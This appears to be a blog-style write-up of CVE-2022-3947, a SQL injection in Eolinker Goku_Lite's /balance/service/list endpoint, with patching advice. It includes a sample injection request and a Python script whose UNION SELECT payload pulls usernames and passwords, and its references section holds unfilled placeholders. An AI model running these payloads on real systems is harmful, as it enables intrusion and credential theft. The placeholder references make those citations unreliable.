A critical security flaw, CVE-2022-3947, has been found in the Eolinker Goku_Lite application. This vulnerability allows attackers to exploit a SQL injection in the /balance/service/list endpoint. Specifically, the flaw is triggered by manipulating the route/keyword argument, enabling attackers to execute arbitrary SQL queries on the server remotely. The vulnerability has been made public, assigned VDB-213453, and exploits are already circulating.

This is an exclusive, easy-to-understand walkthrough of CVE-2022-3947, covering how the vulnerability works, how it can be exploited, and what you can do to stay safe.

What is Eolinker Goku_Lite?

Eolinker Goku_Lite is an API gateway and management platform, often used by development teams to manage, monitor, and secure their APIs. Like any web application, it interacts with back-end databases where user data or API details are stored.


## The Vulnerability: SQL Injection via /balance/service/list

Vulnerability type: SQL Injection (Critical)

- Component: /balance/service/list
- Parameter: route/keyword

Remote exploit: Yes

- CVE-ID: CVE-2022-3947
- VulDB-ID: VDB-213453

How the Attack Works

The /balance/service/list endpoint takes user input via the route/keyword parameter. Unfortunately, this input isn't properly sanitized or validated before being used in an SQL query. This opens the door for attackers to inject arbitrary SQL commands.

Example Vulnerable Request

POST /balance/service/list HTTP/1.1
Host: target-host
Content-Type: application/json

{
    "route": {
        "keyword": "' OR '1'='1"
    }
}

With the payload above, the SQL query crafted inside the application could become something like

SELECT * FROM services WHERE name = '' OR '1'='1'

This would return all rows in the services table, which is not intended and could leak sensitive data.

Extract sensitive info: Attackers can fetch or dump whole database tables.

- Bypass authentication: If user authentication relies on a backend query, it can be tricked to always return true, letting attackers log in without credentials.
- Modify or delete data: With more advanced payloads, an attacker could modify or even delete records.
- Gain further control: In worst cases, attackers could chain this with other vulnerabilities to get shell access.

Exploit Code

Here is a basic Python script that demonstrates exploitation of this flaw to extract data from the database.

import requests

url = "http://target-host/balance/service/list";
payload = {
    "route": {
        "keyword": "' UNION SELECT 1, username, password FROM users -- "
    }
}
headers = {"Content-Type": "application/json"}

r = requests.post(url, json=payload, headers=headers)
print(r.text)

Warning:
This code is for educational purposes only. Do not use it on systems you don't own!

Exploit in the Wild

The exploit for this vulnerability has already been made public. Threat actors with little expertise can now craft payloads and target vulnerable Eolinker Goku_Lite installations across the internet.

- VulDB advisory link
- OffSec advisory (if available) *(Check availability)*
- GitHub PoC example *(Example name, may not be present)*

If you use Eolinker Goku_Lite

1. Update Immediately: Check Eolinker releases or official advisory for patches.
2. Sanitize Inputs: Ensure all user input is validated and sanitized. Use parameterized queries whenever possible.

Conclusion

CVE-2022-3947 shows how an improperly sanitized web parameter can jeopardize a whole system’s security. If you use Eolinker Goku_Lite, you must fix this issue immediately. Attackers can remotely exploit this SQL injection to steal, modify, or delete your critical data.

Be proactive—patch, monitor, and secure your API infrastructure.

Further Reading & References

- NVD Entry for CVE-2022-3947
- VulDB Advisory
- SQL Injection Basics: OWASP Guide

Timeline

Published on: 11/11/2022 13:15:00 UTC
Last modified on: 11/15/2022 21:05:00 UTC